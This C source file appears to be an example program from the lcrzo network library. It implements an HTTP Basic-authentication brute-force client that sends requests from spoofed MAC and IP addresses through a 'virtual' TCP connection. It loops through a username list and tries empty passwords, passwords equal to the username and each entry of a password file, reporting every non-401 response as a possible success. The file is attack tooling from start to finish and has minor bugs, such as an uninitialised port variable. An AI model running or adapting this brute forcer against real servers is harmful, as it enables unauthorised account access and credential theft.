
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"
#include "shared/shared_http.h"

/*-------------------------------------------------------------*/
/* set information about this example */
lcrzoex_infos lcrzoex_000203=
{ /*reference*/     "lcrzoex", 203,
  /*version*/       1, 0,
  /*title*/         "virtual tcp client [web get brute force]",
  /*french title*/  "client tcp virtuel [web get brute force]",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "device clieth serveth cliname servname cliport servport url usernamesfile passwdsfile",
  /*french usage*/  "device ethcli ethserv nomcli nomserv portcli portserv url fichierutilisateurs fichiermotsdepasse",
  /*usage example*/ "eth0 aa:bbcc:dd:ee:ff 11:22:33:44:55:66 1.2.3.5 1.2.3.4 5555 80 /index.html /tmp/userlist /tmp/passlist",
  /*fr. usage ex.*/ "eth0 aa:bbcc:dd:ee:ff 11:22:33:44:55:66 1.2.3.5 1.2.3.4 5555 80 /index.html /tmp/listutil /tmp/listepasswd",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000203_main(int argc, char *argv[]);
lcrzo_uint16 lcrzoex_000203_http_get_brute_clientport;
int lcrzoex_000203_http_get_brute(const lcrzo_device device,
				  const lcrzo_etha clientetha,
				  const lcrzo_etha serveretha,
				  const lcrzo_ipl clientipl,
				  const lcrzo_ipl serveripl,
				  lcrzo_uint16 serverport,
				  lcrzo_conststring url,
				  lcrzo_conststring hostname,
				  lcrzo_conststring user,
				  lcrzo_conststring pass);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000203_main(int argc, char *argv[])
{ lcrzo_etha clientetha, serveretha;
  lcrzo_ipl clientipl, serveripl;
  lcrzo_uint16 clientport, serverport;
  lcrzo_data data;
  lcrzo_string user, pass;
  lcrzo_int32 datasize;
  int fduser, fdpass;

  if ( argc<11 )
  { /* print usage */
    lcrzo_epr(lcrzoex_infos_print(lcrzoex_000203, argv[0]));
    return(LCRZO_ERR_BULCRZOEXBADUSAGE);
  }

  /* initialize the needed variables */
  lcrzo_epr(lcrzo_etha_init_eths(argv[2], clientetha));
  lcrzo_epr(lcrzo_etha_init_eths(argv[3], serveretha));
  lcrzo_epr(lcrzo_ipl_init_hs(argv[4], &clientipl));
  lcrzo_epr(lcrzo_ipl_init_hs(argv[5], &serveripl));
  lcrzoex_000203_http_get_brute_clientport=(lcrzo_uint16)atoi(argv[6]);
  serverport=(lcrzo_uint16)atoi(argv[7]);
  lcrzo_epr(lcrzo_fd_open_read(argv[9], &fduser));

  /* read each line of the files all try to access */  
  while ( lcrzo_fd_readm_line(fduser, LCRZO_TRUE, &data, &datasize)
	  == LCRZO_ERR_OK )
  { user=data;
    user[datasize]='\0';
    /* first, try with pass=="" */
    lcrzo_epr(lcrzoex_000203_http_get_brute(argv[1], clientetha, serveretha,
					    clientipl, serveripl, serverport,
					    argv[8], argv[3],
					    user, ""));
    /* then, try with pass==login */
    lcrzo_epr(lcrzoex_000203_http_get_brute(argv[1], clientetha, serveretha,
					    clientipl, serveripl, serverport,
					    argv[8], argv[3],
					    user, user));
    /* then try each password of the file */
    lcrzo_epr(lcrzo_fd_open_read(argv[10], &fdpass));
    while ( lcrzo_fd_readm_line(fdpass, LCRZO_TRUE, &data, &datasize)
	  == LCRZO_ERR_OK )
    { pass=data;
      pass[datasize]='\0';
      lcrzo_epr(lcrzoex_000203_http_get_brute(argv[1], clientetha, serveretha,
					      clientipl, serveripl, serverport,
					      argv[8], argv[3],
					      user, pass));
      if (clientport>65535) clientport=2048;
      lcrzo_string_free(pass);
    }
    lcrzo_epr(lcrzo_fd_close(fdpass));
    lcrzo_string_free(user);
  }

  /* close */
  lcrzo_epr(lcrzo_fd_close(fduser));
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000203_http_get_brute(const lcrzo_device device,
				  const lcrzo_etha clientetha,
				  const lcrzo_etha serveretha,
				  const lcrzo_ipl clientipl,
				  const lcrzo_ipl serveripl,
				  lcrzo_uint16 serverport,
				  lcrzo_conststring url,
				  lcrzo_conststring hostname,
				  lcrzo_conststring user,
				  lcrzo_conststring pass)
{ static lcrzo_int32 numtest=0;
  lcrzo_sock sock;
  lcrzo_int16 errornumber;
  lcrzo_string errormsg;
  int ret;
  
  /* open the connection */
  ret=LCRZO_ERR_OK+1;
  while (ret!=LCRZO_ERR_OK)
  { ret=lcrzo_sock_tcpcli_virt(device, clientetha, serveretha,
			       clientipl, serveripl, 
			       lcrzoex_000203_http_get_brute_clientport++,
			       serverport, &sock);
    if (ret!=LCRZO_ERR_OK) lcrzo_err_print(ret);
  }

  /* send a request */
  lcrzo_epr(shared_http_request_get(&sock, url, hostname, serverport, 
				    user, pass));

  /* analyze the answer */
  lcrzo_epr(shared_http_response_readheader(&sock,
					    &errornumber,
					    &errormsg,
					    NULL, NULL, NULL, NULL, NULL));
  if ( errornumber!=401 )
  { printf("%s\t%s\t-> %d (%s)\n", user, pass, errornumber, errormsg);
  }
  else
  { numtest++;
    if (!(numtest%10)) printf("%ld passwd tried\n", numtest);
  }
  lcrzo_string_free(errormsg);

  /* close */
  lcrzo_epr(lcrzo_sock_close(&sock));

  return(LCRZO_ERR_OK);
}



